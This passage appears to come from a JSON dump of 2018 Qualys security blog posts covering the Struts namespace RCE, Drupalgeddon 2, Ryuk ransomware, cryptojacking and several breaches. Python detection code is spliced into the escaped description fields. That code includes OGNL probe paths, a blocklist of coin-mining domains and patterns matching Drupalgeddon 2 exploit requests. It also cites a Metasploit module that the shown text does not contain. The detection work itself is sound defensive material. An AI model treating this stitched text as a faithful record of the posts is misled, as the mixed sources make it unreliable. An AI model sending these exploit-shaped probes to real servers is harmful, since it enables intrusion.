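                if any(p.get("name") == "namespace" for p in result.iter("param")):
                    continue  # explicit namespace: not taken from the URL
                findings.append((pkg.get("name"), action.get("name"), result.get("name", "success")))
    return findings


def is_s2_057_probe(request_target):
    """True when a path segment before the action name contains an OGNL marker,
    e.g. /struts2-showcase/${(111+111)}/actionChain1.action (the public PoC shape).
    Decoded twice so double-encoded probes are caught; the query string is ignored
    because the namespace is taken from the path only."""
    path = request_target.split("?", 1)[0]
    decoded = unquote(unquote(path))
    namespace_segments = decoded.split("/")[:-1]  # the last segment is the action name
    return any(OGNL_MARKER.search(seg) for seg in namespace_segments)


# Constructed sample struts.xml: one package wide open, one with a fixed namespace.
SAMPLE_STRUTS_XML = """<struts>
  <constant name="struts.mapper.alwaysSelectFullNamespace" value="true"/>
  <package name="default" extends="struts-default">
    <action name="actionChain1" class="example.ChainAction">
      <result type="redirectAction">register2</result>
    </action>
  </package>
  <package name="safe" namespace="/secure" extends="struts-default">
    <action name="login" class="example.LoginAction">
      <result type="redirectAction">
        <param name="actionName">home</param>
        <param name="namespace">/secure</param>
      </result>
    </action>
  </package>
</struts>"""

# Constructed request targets as they would appear in an access log.
SAMPLE_TARGETS = [
    "/struts2-showcase/actionChain1.action",
    "/struts2-showcase/%24%7B%28111%2B111%29%7D/actionChain1.action",
    "/struts2-showcase/${(111+111)}/actionChain1.action",
    "/search.action?q=${x}",  # marker only in the query string, not a namespace probe
]

if __name__ == "__main__":
    print("alwaysSelectFullNamespace:", always_select_full_namespace(SAMPLE_STRUTS_XML))
    for finding in audit_struts_xml(SAMPLE_STRUTS_XML):
        print("result inherits request namespace:", finding)
    for target in SAMPLE_TARGETS:
        print("probe" if is_s2_057_probe(target) else "ok   ", target)
```

Run it against a real struts.xml and a day of access logs: a finding from the audit means the application is exposed once the full-namespace precondition holds, and a probe hit in the logs means someone is already testing for it; both deserve the upgrade to 2.3.35 or 2.5.17 regardless.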
Qualys has defined two QIDs to detect this vulnerability (QID 13251 and QID 371151), and created dynamic [dashboards](<https://community.qualys.com/docs/DOC-6515-dashboards-and-reporting-detecting-apache-struts-2-namespace-rce-cve-2018-11776?_ga=2.73902801.230834091.1535379602-620242525.1458325156>) to visualize exposure to it.\n\n\n\nGraham also describes how the Qualys Web Application Firewall (WAF) can mitigate the vulnerability.\n\nMore information:\n\n[Apache Struts 2 namespace Remote Code Execution Vulnerability: CVE-2018-11776](<https://threatprotect.qualys.com/2018/08/22/apache-struts-2-namespace-remote-code-execution-vulnerability-cve-2018-11776/?_ga=2.140995313.230834091.1535379602-620242525.1458325156>) _(Qualys)_\n\n[Apache Struts 2 Flaw Uncovered: \u2018More Critical Than Equifax Bug\u2019](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>) _(ThreatPost)_\n\n[Admins Urged: Stop Everything and Patch New Apache Struts Flaw](<https://www.infosecurity-magazine.com/news/admins-stop-everything-patch/>) _(InfoSecurity)_\n\n[Experts Urge Rapid Patching of \u2018Struts\u2019 Bug](<https://krebsonsecurity.com/2018/08/experts-urge-rapid-patching-of-struts-bug/>) _(Krebs on Security)_\n\n[PoC Code Surfaces to Exploit Apache Struts 2 Vulnerability](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) _(ThreatPost)_\n\n### Ransomware Campaign Attacks Selected Organizations\n\nCyber thieves recently began attacking handpicked corporations with ransomware and demanding sky-high bitcoin payments.\n\nThe criminals are deliberately targeting specific large businesses, and they\u2019re using ransomware called Ryuk that\u2019s designed for tailored attacks. 
They reportedly netted more than $600,000 during the campaign\u2019s first two weeks.\n\n\u201cIts encryption scheme is intentionally built for small-scale operations, such that only crucial assets and resources are infected in each targeted network with its infection and distribution carried out manually by the attackers,\u201d CheckPoint researchers [wrote](<https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/>).\n\nThe implication is that prior to each attack, \u201cextensive network mapping, hacking and credential collection\u201d is conducted by the miscreants, believed to have ties to the notorious hacker collective Lazarus Group and be experienced in targeted attacks, according to the researchers.\n\nMore information:\n\n[This new ransomware campaign targets business and demands a massive bitcoin ransom](<https://www.zdnet.com/article/this-new-ransomware-campaign-targets-business-and-demands-a-massive-bitcoin-ransom/>) _(ZDnet)_\n\n[Ryuk Ransomware Emerges in Highly Targeted, Highly Lucrative Campaign](<https://threatpost.com/ryuk-ransomware-emerges-in-highly-targeted-highly-lucrative-campaign/136755/>) _(ThreatPost)_\n\n[Ryuk Ransomware Crew Makes $640,000 in Recent Activity Surge](<https://www.bleepingcomputer.com/news/security/ryuk-ransomware-crew-makes-640-000-in-recent-activity-surge/>) _(BleepingComputer)_\n\n### T-Mobile Hacked, Millions Affected\n\nPersonal information of 2 million T-Mobile customers, [including encrypted passwords](<https://motherboard.vice.com/en_us/article/a3qpk5/t-mobile-hack-data-breach-api-customer-data>), may have been accessed by hackers via a breached API on August 20.\n\nThe compromised data may have included names, billing zip codes, phone numbers, email addresses, and account numbers, but not financial information nor Social Security numbers, [according to the company](<https://www.t-mobile.com/customers/6305378821>). 
T-Mobile hasn\u2019t provided further details on the nature of the attack.\n\nIn related news, customer security PINs from T-Mobile and AT&T were found to be accessible due to unrelated flaws in partners\u2019 websites, [according to BuzzFeed](<https://www.buzzfeednews.com/article/nicolenguyen/tmobile-att-account-pin-security-flaw-apple>). Apple\u2019s online store exposed the T-Mobile data, while the website of phone insurance company Asurion exposed AT&T\u2019s data. Both companies fixed the flaws after being alerted to them.\n\nAccess to a mobile account PIN could let a hacker \u201ceasily commandeer your phone number and use it to trick the SMS-based authentication designed to verify your identity when you log on to your bank, email provider, or social media accounts,\u201d wrote Nicole Nguyen in BuzzFeed.\n\nMeanwhile, a security researcher was able to [enter a Sprint employee portal](<https://techcrunch.com/2018/08/25/hacker-accessed-sprint-portal-customer-data/>) protected by weak credentials, and said customer data could have been accessed.\n\nMore information:\n\n[Passwords Part of Data Breach, T-Mobile Admits: What to Do Now](<https://www.tomsguide.com/us/tmobile-breach-2018,news-27876.html>) _(Tom\u2019s Guide)_\n\n[Why T-Mobile's Data Breach Should Be a Wake-Up Call](<https://www.fool.com/investing/2018/08/27/why-t-mobiles-data-breach-should-be-a-wake-up-call.aspx>) _(Motley Fool)_\n\n[2 Million T-Mobile Customers Are Hit by a Data Breach](<https://www.consumerreports.org/privacy/2-million-t-mobile-customers-hit-by-data-breach/>) _(Consumer Reports)_\n\n[Security researchers found vulnerabilities at AT&T, T-Mobile, and Sprint that could have exposed customer data](<https://www.theverge.com/2018/8/25/17781906/att-tmobile-sprint-security-vulnerabilities-customer-information>) _(The Verge)_\n\n[T-Mobile, AT&T customer account PINs were exposed by website flaws](<https://www.engadget.com/2018/08/25/t-mobile-att-pin-vulnerability/>) _(Engadget)_\n\n### 
Android Malware Records Calls, Takes Videos\n\nMalware that infects Android devices and conducts extensive snooping has been discovered bundled in a malicious app that mimics a legitimate one.\n\nCalled Triout, the spyware can stealthily record phone calls, log incoming text messages, take videos, snap photos, collect location data and transmit everything it collects to a command-and-control server, [according to Bitdefender](<https://www.bitdefender.com/files/News/CaseStudies/study/234/Bitdefender-Whitepaper-Triout-The-Malware-Framework-for-Android-That-Packs-Potent-Spyware-Capabilities.pdf>), which discovered it.\n\n\u201cThe malware was first observed lurking in an app, repackaged to look identical to a legitimate Android app called \u2018Sex Game.\u2019 It was available in the Google Play store starting in 2016, but has since been removed,\u201d a ThreatPost [article](<https://threatpost.com/triout-malware-carries-out-extensive-targeted-android-surveillance/136773/>) reads.\n\nMore information:\n\n[Android 'Triout' spyware records calls, sends photos and text messages to attackers](<https://www.csoonline.com/article/3299700/security/android-triout-spyware-records-calls-sends-photos-and-text-messages-to-attackers.html>) _(CSO)_\n\n[This Android spyware records calls and sends your pictures and location to hackers](<https://www.zdnet.com/article/android-spyware-malware-records-calls-and-sends-your-pictures-to-hackers/>) _(ZDnet)_\n\n[New Android Triout Malware Can Record Phone Calls, Steal Pictures](<https://www.bleepingcomputer.com/news/security/new-android-triout-malware-can-record-phone-calls-steal-pictures/>) _(BleepingComputer)_\n\n### In Other News \u2026\n\n * Cyber thieves [stole](<https://cheddars.com/customer-notification/>) payment card information from Cheddar\u2019s Scratch Kitchen restaurants in 23 U.S. 
states for two months late last year, potentially affecting [almost 600,000 customers](<https://www.prnewswire.com/news-releases/notice-of-unauthorized-access-to-cheddars-scratch-kitchen-guest-data-300701161.html>).\n * Apple was hacked by a 16-year-old Australian boy who told authorities he [dreamed of working](<https://hotforsecurity.bitdefender.com/blog/apple-hacked-by-16-year-old-who-dreamed-of-working-for-firm-20254.html>) at the company.\n * Adobe issued [out-of-band fixes](<https://helpx.adobe.com/security/products/photoshop/apsb18-28.html>) for remote code execution vulnerabilities in Photoshop CC, barely a week after its scheduled monthly set of patches.\n * Spyfone, a company that lets parents and employers monitor mobile devices, left an AWS S3 storage bucket unprotected, [exposing all manner of personal data](<https://motherboard.vice.com/amp/en_us/article/9kmj4v/spyware-company-spyfone-terabytes-data-exposed-online-leak>) from thousands of customers.", "cvss3": {}, "published": "2018-08-27T18:32:33", "type": "qualysblog", "title": "Security News: Hackers Aim Ransomware at Big Cos., as Experts Call for Swift Patching of Struts Bug", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-27T18:32:33", "id": "QUALYSBLOG:5E5409E093DE06FE967B988870D82540", "href": "https://blog.qualys.com/news/2018/08/27/security-news-hackers-aim-ransomware-at-big-cos-as-experts-call-for-swift-patching-of-struts-bug", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-14T20:46:20", "description": "Qualys Malware Research Labs is announcing the release of the [Qualys BrowserCheck CoinBlocker](<https://chrome.google.com/webstore/detail/qualys-browsercheck-coinb/jdocohkgkgpminecekdnkoljcffebkgc>) Chrome extension to detect and block browser-based cryptocurrency mining, 
aka _cryptojacking_.\n\n### Cryptojacking\n\nCryptojacking attacks use malicious JavaScript to consume the victim system\u2019s resources to mine certain cryptocurrencies. Attackers carry out these attacks by infecting popular sites with JavaScript that performs the mining. Any visitor to such a site downloads the JavaScript and unknowingly contributes their system\u2019s resources to mine a cryptocurrency that is credited to the attacker\u2019s wallet. The resource-intensive mining process carried out on victim systems typically consumes more than 70% of the CPU, which reduces system performance, increases power consumption and can cause permanent damage to the system.\n\nBecause cryptojacking lets attackers earn cryptocurrency without spending a dime on mining infrastructure, it is very profitable. The overall cryptocurrency market capitalization had reached more than $270 billion as of July 2018, with more than 1700 active projects. There is a lot of money to be made for attackers leveraging these projects, and cryptomining is gradually moving to the center stage of the threat landscape as an even more attractive option than the recent favorite, ransomware campaigns.\n\nCryptojacking has also gone mainstream recently because it is safer for cyber criminals and webmasters than ransomware, which requires interaction with the victim to collect payment. And because cryptojacking is browser based, it is easier to infect victims than to hack into servers. 
As cryptomining becomes more resource-intensive over time in terms of the compute power and electricity it requires, stealing those resources is becoming more enticing to attackers.\n\n### Cryptojacking and Monero\n\n[Monero (XMR)](<https://en.wikipedia.org/wiki/Monero_\\(cryptocurrency\\)>), a relatively new cryptocurrency, is becoming a more common target of cryptojacking attackers because its mining algorithm ([CryptoNight](<https://en.wikipedia.org/wiki/CryptoNote#Egalitarian_proof_of_work>)) runs efficiently on ordinary CPUs and because its privacy and anonymity features also benefit hackers. Monero\u2019s proof-of-work algorithm can be mined with desktop- or server-grade CPUs rather than the specialized ASIC or GPU hardware that traditional coin mining algorithms require. This is an important aspect of new-generation cryptocurrencies, which try to stay decentralized by preventing a small set of users with access to specialized hardware from creating a mining monopoly. From an attacker\u2019s standpoint, the possibility of making sizable profits off desktop-grade CPUs, with added privacy, is a lucrative option.\n\nA popular technology used in most browser-based cryptocurrency miners is WASM, short for WebAssembly. It is a binary instruction format that browsers execute alongside JavaScript at near-native speed, which is what makes CPU-heavy hashing such as CryptoNight practical inside a web page.\n\n\n\n_Fig. 1 CryptoNight based cryptocurrencies market capitalization, June 2018. Source: <https://coinmarketcap.com>_\n\n \n\n### Infections\n\nThe security research blog [Bad Packets Report](<https://badpackets.net/>) recently published an [article](<https://badpackets.net/over-100000-drupal-websites-vulnerable-to-drupalgeddon-2-cve-2018-7600/>) reporting that more than 100,000 sites are currently infected with cryptojacking malware. 
Most of these sites appear to have been compromised using an exploit for [Drupalgeddon 2](<https://www.drupal.org/sa-core-2018-002>). The attack exploits [CVE-2018-7600](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>), even though the [patch](<https://cgit.drupalcode.org/drupal/rawdiff/?h=7.x&id=2266d2a83db50e2f97682d9a0fb8a18e2722cba5>) has been available for several months. [Side note: Always patch regularly!] There are reports of malware campaigns leveraging a recently released exploit for this vulnerability to compromise victims and inject coin mining scripts. Once a user visits one of these compromised sites, their system unwittingly contributes towards solving a crypto puzzle that benefits the attackers.\n\nTo protect users\u2019 computing resources from being drained by unauthorized coin mining scripts, block access to the following popular coin mining services (domains defanged with [.]):\n\n * coinhive[.]com\n * load[.]jsecoin[.]com\n * crypto-loot[.]com\n * coin-have[.]com\n * ppoi[.]org\n * cryptoloot[.]pro\n * papoto[.]com\n * coinlab[.]biz\n\n### Qualys BrowserCheck CoinBlocker Extension for Google Chrome\n\nBased on extensive research from Qualys Malware Research Labs, we are announcing [Qualys BrowserCheck CoinBlocker](<https://chrome.google.com/webstore/detail/qualys-browsercheck-coinb/jdocohkgkgpminecekdnkoljcffebkgc>), a new Google Chrome browser extension to protect users from browser-based coin mining attacks.\n\nHere are a few screenshots of [Qualys BrowserCheck CoinBlocker](<https://chrome.google.com/webstore/detail/qualys-browsercheck-coinb/jdocohkgkgpminecekdnkoljcffebkgc>) in action:\n\n \n\n\n\n_Fig. 2 Qualys BrowserCheck CoinBlocker_\n\n \n\n\n\n_Fig. 
3 Qualys BrowserCheck CoinBlocker Detection Logs_\n\n \n\nThe Qualys BrowserCheck CoinBlocker extension relies not only on a domain blacklist but also on heuristics that identify the underlying cryptomining algorithm, such as CryptoNight (used for mining Monero), and its artifacts.\n\n### Detecting Traditional Cryptomining Threats\n\nCryptomining is not limited to browser-based scripts: we have seen attackers infect systems with persistent malware that runs outside a browser to mine. To help detect such malware, security professionals can use the [Qualys Indication of Compromise](<https://www.qualys.com/apps/indication-of-compromise/>) (IOC) solution to gain 2-second visibility into coin mining and other malware across their entire organization. Qualys IOC includes behaviour-based malware family detection for the following coin mining threats:\n\n * CryptoMinerA\n * CryptoMinerB\n * CryptoMinerC\n * CryptoMinerD\n * CryptoMinerE\n * Neksminer\n\nCryptomining is a rising online threat that is expected to grow as digital currencies and blockchain technologies gain wider acceptance. Attackers are employing various techniques to use unsuspecting users' systems for malicious purposes. We advise our users to regularly scan systems for vulnerabilities using tools like [Qualys BrowserCheck](<https://browsercheck.qualys.com/>). 
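The two checks the post describes, a domain blacklist and heuristics for miner artifacts, as an added Python example (not the CoinBlocker extension's own code): the defanged domain list from this post is applied to script URLs, and a content heuristic scores a script body for CryptoNight/WebAssembly artifacts so that a single legitimate WebAssembly call does not trigger a block. The artifact patterns and the score threshold are assumptions of this example; the script URLs and bodies are constructed samples.

```python
"""Browser cryptojacking checks, added example (not the CoinBlocker extension's code):
a domain blocklist applied to script URLs plus a content heuristic for miner artifacts."""
import re
from urllib.parse import urlparse

# The defanged list from the post. "[.]" keeps the names from being clickable; a
# blocker matches them as real hostnames, so they are refanged below.
DEFANGED_MINING_DOMAINS = [
    "coinhive[.]com", "load[.]jsecoin[.]com", "crypto-loot[.]com", "coin-have[.]com",
    "ppoi[.]org", "cryptoloot[.]pro", "papoto[.]com", "coinlab[.]biz",
]
MINING_DOMAINS = {d.replace("[.]", ".").lower() for d in DEFANGED_MINING_DOMAINS}

# Strings typical of CryptoNight-style in-browser miners. ASSUMPTION of this example;
# the post says only that CoinBlocker uses heuristics for CryptoNight and its artifacts.
MINER_ARTIFACTS = [
    re.compile(r"cryptonight", re.I),                          # algorithm name in symbols
    re.compile(r"WebAssembly\.(instantiate|Module|compile)"),  # WASM hashing core
    re.compile(r"\bstratum\+tcp://", re.I),                    # mining pool protocol URL
    re.compile(r"\bCoinHive\.(Anonymous|User)\b"),             # the CoinHive JS API
    re.compile(r"\bthrottle\s*:\s*0?\.\d+", re.I),             # CPU throttle knob
]


def host_is_blocked(url):
    """Exact or subdomain match against the blocklist (notcoinhive.com must not match)."""
    host = (urlparse(url).hostname or "").lower()
    return any(host == d or host.endswith("." + d) for d in MINING_DOMAINS)


def script_score(script_text):
    """Number of distinct miner artifacts present. One WebAssembly call alone is not
    enough, since games and codecs use WASM legitimately."""
    return sum(1 for pattern in MINER_ARTIFACTS if pattern.search(script_text))


def classify_scripts(scripts, threshold=2):
    """scripts: iterable of (url, text). Returns [(url, verdict)], where verdict is
    'blocklist' (domain hit), 'heuristic' (score >= threshold) or 'allow'."""
    verdicts = []
    for url, text in scripts:
        if host_is_blocked(url):
            verdicts.append((url, "blocklist"))
        elif script_score(text) >= threshold:
            verdicts.append((url, "heuristic"))
        else:
            verdicts.append((url, "allow"))
    return verdicts


# Constructed sample script tags: URL plus an abridged body.
SAMPLE_SCRIPTS = [
    ("https://coinhive.com/lib/coinhive.min.js", "/* body irrelevant: domain is blocked */"),
    ("https://cdn.example.net/app.js",
     "var mod=new WebAssembly.Module(buf);var h=cryptonight_hash(blob);"
     "var pool='stratum+tcp://pool.example:3333';"),
    ("https://cdn.example.net/vendor.js", "WebAssembly.instantiate(wasm).then(run);"),
    ("https://static.example.org/jquery.min.js", "(function($){$.fn.tip=function(){};})(jQuery);"),
]

if __name__ == "__main__":
    for url, verdict in classify_scripts(SAMPLE_SCRIPTS):
        print(f"{verdict:9s} {url}")
```

The blocklist catches the known services cheaply; the score is what catches a self-hosted copy of the same miner served from a domain nobody has listed yet, which is the case the post's "heuristics" remark is about.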
Stay protected online from crypto-mining attacks with [Qualys BrowserCheck CoinBlocker](<https://chrome.google.com/webstore/detail/qualys-browsercheck-coinb/jdocohkgkgpminecekdnkoljcffebkgc>) Chrome extension.", "cvss3": {}, "published": "2018-07-25T17:00:02", "type": "qualysblog", "title": "Staying Safe in the Era of Browser-based Cryptocurrency Mining", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-07-25T17:00:02", "id": "QUALYSBLOG:DEB92D82F8384860B06735A45F20B980", "href": "https://blog.qualys.com/technology/2018/07/25/staying-safe-in-the-era-of-browser-based-cryptocurrency-mining", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-23T20:50:12", "description": "In our weekly roundup of InfoSec happenings, we start, as has often been the case this year, with concerning Meltdown / Spectre news -- this time involving Microsoft -- and also touch on a password hack at Under Armour, a WannaCry infection at Boeing, and a severe Drupal vulnerability.\n\n### Microsoft patches its Meltdown patch, then patches it again\n\nIn an instance of the cure possibly being worse than the disease, a Microsoft patch for Meltdown released in January created a gaping security hole in certain systems in which it was installed.\n\n\n\nIt took Microsoft two tries to fix the issue, which affects Windows 7 (x64) and Windows Server 2008 R2 (x64) systems. 
The company thought it had solved the vulnerability ([CVE-2018-1038](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-1038>)) with a scheduled patch last Tuesday, but then had to rush out an emergency fix two days later.\n\nSecurity researcher Ulf Frisk, who discovered the vulnerability, [called it](<http://blog.frizk.net/2018/03/total-meltdown.html?m=1>) \u201cway worse\u201d than Meltdown because it \u201callowed any process to read the complete memory contents at gigabytes per second\u201d and made it possible to write to arbitrary memory as well.\n\n\u201cNo fancy exploits were needed. Windows 7 already did the hard work of mapping in the required memory into every running process,\u201d Frisk wrote. \u201cExploitation was just a matter of read and write to already mapped in-process virtual memory. No fancy APIs or syscalls required -- just standard read and write.\u201d\n\nAs Qualys\u2019 Director of Product Management for Patch Management Gill Langston [wrote](<https://blog.qualys.com/laws-of-vulnerabilities/2018/03/30/a-patch-for-the-meltdown-patch-released-out-of-band-thursday-night>) in this blog, there are no current active attacks against this vulnerability but there is proof-of-concept code. \u201cOpportunistic actors could weaponize this exploit by using a multi-stage attack to gain access to an affected asset,\u201d he warned.\n\nLangston recommends that organizations install Thursday\u2019s out-of-band patch if they installed any of the security updates in January of this year or later. \u201cAlso ensure that other layers of protection (anti-malware, email security, web filtering) are up to date to minimize your risk profile,\u201d he wrote.\n\nQualys created QID 91440 in [Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>). 
Detection requires authenticated scanning or a [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) installed on the asset.\n\n### Under Armour\u2019s MyFitnessPal app passwords swiped\n\nCyber thieves stole usernames, email addresses, and hashed passwords from 150 million accounts of Under Armour\u2019s MyFitnessPal app at some point during February. Those affected must change their MyFitnessPal app passwords immediately, and should do the same on any other online account where they\u2019ve used that same password.\n\nThey also should be vigilant about suspicious activity on all their other online accounts, and about unsolicited requests to provide personal information, visit webpages, click on email links or download attachments.\n\n\n\nUnder Armour, a sports apparel maker, made no mention in its [breach notice](<https://content.myfitnesspal.com/security-information/notice.html>) of how the hackers were able to access the data. The company discovered the hack last week.\n\nOver at Sophos\u2019 [Naked Security blog](<https://nakedsecurity.sophos.com/2018/03/30/150-million-myfitnesspal-accounts-compromised-heres-what-to-do/>), Mark Stockley points out that the hackers had at least a month \u201cto send targeted MyFitnessPal phishing emails, to crack the stolen password hashes, and to try any cracked passwords on other services (such as social media accounts).\u201d\n\n\u201cSince the information at risk can be used to log in to your MyFitnessPal account, all the data you see when you log in to your account is also at risk,\u201d he added.\n\n[Writing in Wired](<https://www.wired.com/story/under-armour-myfitnesspal-hack-password-hashing/>), Lily Hay Newman gives a thorough analysis of the hack, and of what Under Armour did well (quick disclosure, system segmentation, use of the bcrypt hashing function) and not so well (use of the SHA-1 hashing function).\n\n### WannaCry infects Boeing systems\n\nIf you thought WannaCry was oh so 2017, think again. 
The notorious ransomware grabbed headlines again last week when [news broke](<https://www.seattletimes.com/business/boeing-aerospace/boeing-hit-by-wannacry-virus-fears-it-could-cripple-some-jet-production/>) that it had cropped up at giant airplane manufacturer Boeing.\n\nWhen it was first detected, Boeing leaders feared the worst, including manufacturing process disruptions, but when the dust cleared it seems the damage was [quickly contained and pretty limited](<https://twitter.com/BoeingAirplanes/status/979134166959783937>).\n\n\u201cWe\u2019ve done a final assessment,\u201d Linda Mills, the head of communications for Boeing Commercial Airplanes, told The Seattle Times. \u201cThe vulnerability was limited to a few machines. We deployed software patches. There was no interruption to the 777 jet program or any of our programs.\u201d\n\nStill, the incident serves as a good reminder that WannaCry -- formal name WanaCrypt0r 2.0 -- spreads using an exploit called EternalBlue for Windows SMB vulnerabilities that Microsoft patched in March 2017, more than a year ago now.\n\nThe vulnerabilities, in Windows\u2019 SMB (Server Message Block) protocol and described in [security bulletin MS17-010](<https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010>), were rated \u201cCritical\u201d at the time by Microsoft due to the potential for attackers to execute code remotely on affected systems.\n\nWriting in Sophos\u2019 Naked Security blog, John E. 
Dunn suggests that systems remain unpatched for WannaCry because remediating these vulnerabilities isn\u2019t always straightforward.\n\n\u201cOne reason for this persistence is that WannaCry doesn\u2019t just affect regular desktops, laptops and servers, but also spreads to and from unpatched Windows 7 systems of the sort widely used in manufacturing as Windows Embedded,\u201d Dunn [wrote](<https://nakedsecurity.sophos.com/2018/03/29/boeing-hit-by-wannacry-reminding-everyone-the-threat-is-still-there/>).\n\nHere\u2019s [more information](<https://community.qualys.com/docs/DOC-6110?_ga=2.192879138.925004837.1522623823-480546418.1484260199>) on how to detect and address the MS17-010 vulnerabilities with Qualys products.\n\nOther WannaCry resources from Qualys include:\n\n * Detailed walkthrough of [how to report on it](<https://community.qualys.com/docs/DOC-6111?_ga=2.197079204.925004837.1522623823-480546418.1484260199>) for those new to Qualys.\n * Detailed walkthrough of [how to build WannaCry dashboards](<https://community.qualys.com/docs/DOC-6122-how-to-create-assetview-widgets-to-report-on-wannacry?_ga=2.197079204.925004837.1522623823-480546418.1484260199>) in AssetView. 
Also available as a [webcast](<https://lps.qualys.com/visualize-your-threat-exposure-to-wannacry-and-shadow-brokers-with-dashboards.html?_ga=2.197079204.925004837.1522623823-480546418.1484260199>).\n * [De-duping WannaCry detections](<https://community.qualys.com/thread/17321-de-duping-wannacry?_ga=2.197079204.925004837.1522623823-480546418.1484260199>)\n * [On-demand WannaCry webcast](<https://lps.qualys.com/rapidly-identify-assets-risk-wannacry-ransomware.html?utm_source=blog&utm_medium=website&utm_campaign=demand-gen&utm_term=wannacry-q2-2017&utm_content=webcast&leadsource=344554153&_ga=2.197079204.925004837.1522623823-480546418.1484260199>), [summary](<https://blog.qualys.com/news/2017/05/19/no-more-tears-wannacry-highlights-importance-of-prompt-precise-vulnerability-remediation>) and [transcript of participant Q&A](<https://blog.qualys.com/technology/2017/05/23/digging-into-wannacry-details-answers-to-your-burning-questions>) showing how to identify at-risk assets and institute threat-prioritized remediation processes for current and future risks.\n * [First-hand perspective](<http://www.techrepublic.com/article/patching-wannacrypt-dispatches-from-the-frontline/>) of how one company kept the threat under control (via TechRepublic)\n * Technical Resources and Detection Methods for WannaCry-related QIDs are found in the WannaCry Support Article: [Qualys response for Global Ransomware Attack (WannaCry)](<https://qualys.secure.force.com/articles/How_To/000001942>)\n\n### Drupal: Highly critical vulnerability affects 1M+ websites\n\nAs it had recently [promised](<https://www.drupal.org/psa-2018-001>), Drupal last week released a patch for a remote code execution vulnerability it rated as \u201chighly critical\u201d that affects multiple subsystems of Drupal 7.x and 8.x.\n\n\u201cThis potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d Drupal 
[warned](<https://www.drupal.org/sa-core-2018-002>) in its advisory.\n\n\n\nIn a companion [FAQ](<https://groups.drupal.org/security/faq-2018-002>), the Drupal security team pegged the scope of affected systems at 9% of sites using its CMS (content management system) platform, or more than 1 million sites. \n\nWhile Drupal has no knowledge of successful exploits of this vulnerability, it nonetheless recommends immediate remediation because \u201csite owners should anticipate that exploits may be developed and should therefore update their sites immediately.\u201d\n\nThe solution: Upgrade to the most recent version of Drupal 7 or 8 core.\n\nSpecifically, those running 7.x should upgrade to [Drupal 7.58](<https://www.drupal.org/project/drupal/releases/7.58>), or alternatively apply [this patch](<https://cgit.drupalcode.org/drupal/rawdiff/?h=7.x&id=2266d2a83db50e2f97682d9a0fb8a18e2722cba5>) on systems that can\u2019t be immediately upgraded. Meanwhile, those running 8.5.x should upgrade to [Drupal 8.5.1](<https://www.drupal.org/project/drupal/releases/8.5.1>), or apply [this patch](<https://cgit.drupalcode.org/drupal/rawdiff/?h=8.5.x&id=5ac8738fa69df34a0635f0907d661b509ff9a28f>) on systems that can\u2019t be immediately upgraded. The FAQ states that Drupal 6 is also affected and points users of that version to its [long term support page](<https://www.drupal.org/project/d6lts>).\n\nWriting in the Qualys Community site, Dave Ferguson, Director of Product Management for Web Application Scanning at Qualys, [called](<https://community.qualys.com/docs/DOC-6373-was-and-newly-discovered-drupal-vulnerabilities>) the vulnerability ([CVE-2018-7600](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600>)) \u201cvery dangerous.\u201d \n\nAccording to Ferguson, customers using Qualys Web Application Scanning (WAS) to scan all their websites on a regular basis can quickly find out if they\u2019re running a vulnerable Drupal version without having to run additional scans. 
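The two Drupalgeddon 2 checks this page touches on, as added example Python (not Qualys WAS code and not the Metasploit module): `is_drupalgeddon2_request` flags requests shaped like the Metasploit module reproduced earlier on this page (a Form API render-array key such as `#post_render` smuggled into a parameter name, the Drupal 7 `file/ajax/.../#value/...` second stage, or the Drupal 8 `user/register` AJAX call whose `element_parents` points at `#value`), and `is_vulnerable_version` compares a version string with the fixed releases named above, 7.58 and 8.5.1. Assumptions: the leading-line format of Drupal 7's `CHANGELOG.txt` (`Drupal 7.57, 2018-02-21`), and treating every 8.x release below 8.5.1 as vulnerable (fixed backports for older 8.x branches are not modeled, since the page names only 8.5.1). The request lines and the changelog are constructed samples.

```python
"""Drupalgeddon 2 / CVE-2018-7600 checks, added example (not Qualys WAS or the
Metasploit module): flag exploit-shaped requests, and compare a Drupal version with
the fixed releases named in SA-CORE-2018-002 (7.58, 8.5.1)."""
import re
from urllib.parse import parse_qsl

# Fixed releases named above. ASSUMPTION: anything older on the same major is treated
# as vulnerable; backported fixes for older 8.x branches are not modeled here.
FIXED = {7: (7, 58), 8: (8, 5, 1)}

# A Form API render-array key inside a submitted field name, e.g. name[#post_render][].
# Drupal never takes "#" keys from user input; that is exactly what the bug allowed.
RENDER_KEY_IN_NAME = re.compile(r"\[#\w+\]")


def _params(target, body):
    """Query-string and POST-body pairs, percent-decoded. '#' survives decoding (the
    request line in an access log normally carries it as %23)."""
    query = target.partition("?")[2]
    return parse_qsl(query, keep_blank_values=True) + parse_qsl(body, keep_blank_values=True)


def is_drupalgeddon2_request(target, body=""):
    """Return a reason string for a request shaped like the Metasploit module's
    traffic, or None. `target` is the request-line path+query; `body` the POST body
    when available (access logs usually lack it, so the Drupal 8 GET parameters matter)."""
    params = _params(target, body)
    path = target.partition("?")[0]
    for name, _ in params:
        if RENDER_KEY_IN_NAME.search(name):
            return "render-array key in parameter name: " + name
    values = dict(params)
    q = values.get("q", "")
    if "/ajax/" in q and "#" in q:  # Drupal 7 second stage: q=file/ajax/name/#value/<build id>
        return "render key in ajax callback path: q=" + q
    element_parents = values.get("element_parents", "")
    if path.rstrip("/").endswith("/user/register") and "#" in element_parents:
        return "AJAX render of user-supplied element: element_parents=" + element_parents
    return None


def version_from_changelog(changelog_text):
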